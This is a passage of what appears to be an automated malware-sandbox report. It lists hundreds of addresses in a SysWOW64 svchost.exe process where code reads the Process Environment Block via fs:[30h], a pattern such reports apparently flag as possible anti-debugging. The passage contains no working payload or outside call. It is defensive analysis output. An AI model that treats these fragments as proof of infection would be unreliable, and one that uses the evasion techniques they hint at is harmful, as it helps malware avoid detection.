Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0323A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0323A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0323A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0323A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0323A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h]	2_2_032383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h]	2_2_032383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h]	2_2_032383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h]	2_2_032383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B63C0 mov eax, dword ptr fs:[00000030h]	2_2_032B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE3DB mov eax, dword ptr fs:[00000030h]	2_2_032DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE3DB mov eax, dword ptr fs:[00000030h]	2_2_032DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE3DB mov ecx, dword ptr fs:[00000030h]	2_2_032DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE3DB mov eax, dword ptr fs:[00000030h]	2_2_032DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D43D4 mov eax, dword ptr fs:[00000030h]	2_2_032D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D43D4 mov eax, dword ptr fs:[00000030h]	2_2_032D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322823B mov eax, dword ptr fs:[00000030h]	2_2_0322823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03234260 mov eax, dword ptr fs:[00000030h]	2_2_03234260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03234260 mov eax, dword ptr fs:[00000030h]	2_2_03234260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03234260 mov eax, dword ptr fs:[00000030h]	2_2_03234260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322826B mov eax, dword ptr fs:[00000030h]	2_2_0322826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B8243 mov eax, dword ptr fs:[00000030h]	2_2_032B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B8243 mov ecx, dword ptr fs:[00000030h]	2_2_032B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322A250 mov eax, dword ptr fs:[00000030h]	2_2_0322A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03236259 mov eax, dword ptr fs:[00000030h]	2_2_03236259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EA250 mov eax, dword ptr fs:[00000030h]	2_2_032EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EA250 mov eax, dword ptr fs:[00000030h]	2_2_032EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032402A0 mov eax, dword ptr fs:[00000030h]	2_2_032402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032402A0 mov eax, dword ptr fs:[00000030h]	2_2_032402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]	2_2_032C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C62A0 mov ecx, dword ptr fs:[00000030h]	2_2_032C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]	2_2_032C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]	2_2_032C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]	2_2_032C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]	2_2_032C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E284 mov eax, dword ptr fs:[00000030h]	2_2_0326E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E284 mov eax, dword ptr fs:[00000030h]	2_2_0326E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B0283 mov eax, dword ptr fs:[00000030h]	2_2_032B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B0283 mov eax, dword ptr fs:[00000030h]	2_2_032B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B0283 mov eax, dword ptr fs:[00000030h]	2_2_032B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032402E1 mov eax, dword ptr fs:[00000030h]	2_2_032402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032402E1 mov eax, dword ptr fs:[00000030h]	2_2_032402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032402E1 mov eax, dword ptr fs:[00000030h]	2_2_032402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0323A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0323A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0323A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0323A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0323A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03260124 mov eax, dword ptr fs:[00000030h]	2_2_03260124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]	2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE10E mov ecx, dword ptr fs:[00000030h]	2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]	2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]	2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE10E mov ecx, dword ptr fs:[00000030h]	2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]	2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]	2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE10E mov ecx, dword ptr fs:[00000030h]	2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]	2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE10E mov ecx, dword ptr fs:[00000030h]	2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DA118 mov ecx, dword ptr fs:[00000030h]	2_2_032DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DA118 mov eax, dword ptr fs:[00000030h]	2_2_032DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DA118 mov eax, dword ptr fs:[00000030h]	2_2_032DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DA118 mov eax, dword ptr fs:[00000030h]	2_2_032DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F0115 mov eax, dword ptr fs:[00000030h]	2_2_032F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h]	2_2_032C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h]	2_2_032C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C4144 mov ecx, dword ptr fs:[00000030h]	2_2_032C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h]	2_2_032C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h]	2_2_032C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322C156 mov eax, dword ptr fs:[00000030h]	2_2_0322C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C8158 mov eax, dword ptr fs:[00000030h]	2_2_032C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03236154 mov eax, dword ptr fs:[00000030h]	2_2_03236154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03236154 mov eax, dword ptr fs:[00000030h]	2_2_03236154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03270185 mov eax, dword ptr fs:[00000030h]	2_2_03270185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EC188 mov eax, dword ptr fs:[00000030h]	2_2_032EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EC188 mov eax, dword ptr fs:[00000030h]	2_2_032EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D4180 mov eax, dword ptr fs:[00000030h]	2_2_032D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D4180 mov eax, dword ptr fs:[00000030h]	2_2_032D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B019F mov eax, dword ptr fs:[00000030h]	2_2_032B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B019F mov eax, dword ptr fs:[00000030h]	2_2_032B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B019F mov eax, dword ptr fs:[00000030h]	2_2_032B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B019F mov eax, dword ptr fs:[00000030h]	2_2_032B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322A197 mov eax, dword ptr fs:[00000030h]	2_2_0322A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322A197 mov eax, dword ptr fs:[00000030h]	2_2_0322A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322A197 mov eax, dword ptr fs:[00000030h]	2_2_0322A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033061E5 mov eax, dword ptr fs:[00000030h]	2_2_033061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032601F8 mov eax, dword ptr fs:[00000030h]	2_2_032601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F61C3 mov eax, dword ptr fs:[00000030h]	2_2_032F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F61C3 mov eax, dword ptr fs:[00000030h]	2_2_032F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_032AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_032AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE1D0 mov ecx, dword ptr fs:[00000030h]	2_2_032AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_032AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_032AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322A020 mov eax, dword ptr fs:[00000030h]	2_2_0322A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322C020 mov eax, dword ptr fs:[00000030h]	2_2_0322C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C6030 mov eax, dword ptr fs:[00000030h]	2_2_032C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B4000 mov ecx, dword ptr fs:[00000030h]	2_2_032B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]	2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]	2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]	2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]	2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]	2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]	2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]	2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]	2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h]	2_2_0324E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h]	2_2_0324E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h]	2_2_0324E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h]	2_2_0324E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325C073 mov eax, dword ptr fs:[00000030h]	2_2_0325C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03232050 mov eax, dword ptr fs:[00000030h]	2_2_03232050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B6050 mov eax, dword ptr fs:[00000030h]	2_2_032B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C80A8 mov eax, dword ptr fs:[00000030h]	2_2_032C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F60B8 mov eax, dword ptr fs:[00000030h]	2_2_032F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F60B8 mov ecx, dword ptr fs:[00000030h]	2_2_032F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323208A mov eax, dword ptr fs:[00000030h]	2_2_0323208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322A0E3 mov ecx, dword ptr fs:[00000030h]	2_2_0322A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032380E9 mov eax, dword ptr fs:[00000030h]	2_2_032380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B60E0 mov eax, dword ptr fs:[00000030h]	2_2_032B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322C0F0 mov eax, dword ptr fs:[00000030h]	2_2_0322C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032720F0 mov ecx, dword ptr fs:[00000030h]	2_2_032720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B20DE mov eax, dword ptr fs:[00000030h]	2_2_032B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326C720 mov eax, dword ptr fs:[00000030h]	2_2_0326C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326C720 mov eax, dword ptr fs:[00000030h]	2_2_0326C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326273C mov eax, dword ptr fs:[00000030h]	2_2_0326273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326273C mov ecx, dword ptr fs:[00000030h]	2_2_0326273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326273C mov eax, dword ptr fs:[00000030h]	2_2_0326273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AC730 mov eax, dword ptr fs:[00000030h]	2_2_032AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326C700 mov eax, dword ptr fs:[00000030h]	2_2_0326C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03230710 mov eax, dword ptr fs:[00000030h]	2_2_03230710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03260710 mov eax, dword ptr fs:[00000030h]	2_2_03260710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03238770 mov eax, dword ptr fs:[00000030h]	2_2_03238770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326674D mov esi, dword ptr fs:[00000030h]	2_2_0326674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326674D mov eax, dword ptr fs:[00000030h]	2_2_0326674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326674D mov eax, dword ptr fs:[00000030h]	2_2_0326674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03230750 mov eax, dword ptr fs:[00000030h]	2_2_03230750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BE75D mov eax, dword ptr fs:[00000030h]	2_2_032BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272750 mov eax, dword ptr fs:[00000030h]	2_2_03272750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272750 mov eax, dword ptr fs:[00000030h]	2_2_03272750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B4755 mov eax, dword ptr fs:[00000030h]	2_2_032B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032307AF mov eax, dword ptr fs:[00000030h]	2_2_032307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E47A0 mov eax, dword ptr fs:[00000030h]	2_2_032E47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D678E mov eax, dword ptr fs:[00000030h]	2_2_032D678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032527ED mov eax, dword ptr fs:[00000030h]	2_2_032527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032527ED mov eax, dword ptr fs:[00000030h]	2_2_032527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032527ED mov eax, dword ptr fs:[00000030h]	2_2_032527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BE7E1 mov eax, dword ptr fs:[00000030h]	2_2_032BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032347FB mov eax, dword ptr fs:[00000030h]	2_2_032347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032347FB mov eax, dword ptr fs:[00000030h]	2_2_032347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323C7C0 mov eax, dword ptr fs:[00000030h]	2_2_0323C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B07C3 mov eax, dword ptr fs:[00000030h]	2_2_032B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324E627 mov eax, dword ptr fs:[00000030h]	2_2_0324E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03266620 mov eax, dword ptr fs:[00000030h]	2_2_03266620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03268620 mov eax, dword ptr fs:[00000030h]	2_2_03268620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323262C mov eax, dword ptr fs:[00000030h]	2_2_0323262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE609 mov eax, dword ptr fs:[00000030h]	2_2_032AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]	2_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]	2_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]	2_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]	2_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]	2_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]	2_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]	2_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272619 mov eax, dword ptr fs:[00000030h]	2_2_03272619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F866E mov eax, dword ptr fs:[00000030h]	2_2_032F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F866E mov eax, dword ptr fs:[00000030h]	2_2_032F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A660 mov eax, dword ptr fs:[00000030h]	2_2_0326A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A660 mov eax, dword ptr fs:[00000030h]	2_2_0326A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03262674 mov eax, dword ptr fs:[00000030h]	2_2_03262674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324C640 mov eax, dword ptr fs:[00000030h]	2_2_0324C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326C6A6 mov eax, dword ptr fs:[00000030h]	2_2_0326C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032666B0 mov eax, dword ptr fs:[00000030h]	2_2_032666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03234690 mov eax, dword ptr fs:[00000030h]	2_2_03234690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03234690 mov eax, dword ptr fs:[00000030h]	2_2_03234690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_032AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_032AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_032AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_032AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B06F1 mov eax, dword ptr fs:[00000030h]	2_2_032B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B06F1 mov eax, dword ptr fs:[00000030h]	2_2_032B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A6C7 mov ebx, dword ptr fs:[00000030h]	2_2_0326A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A6C7 mov eax, dword ptr fs:[00000030h]	2_2_0326A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]	2_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]	2_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]	2_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]	2_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]	2_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]	2_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]	2_2_0325E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]	2_2_0325E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]	2_2_0325E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]	2_2_0325E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]	2_2_0325E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C6500 mov eax, dword ptr fs:[00000030h]	2_2_032C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]	2_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]	2_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]	2_2_03304500
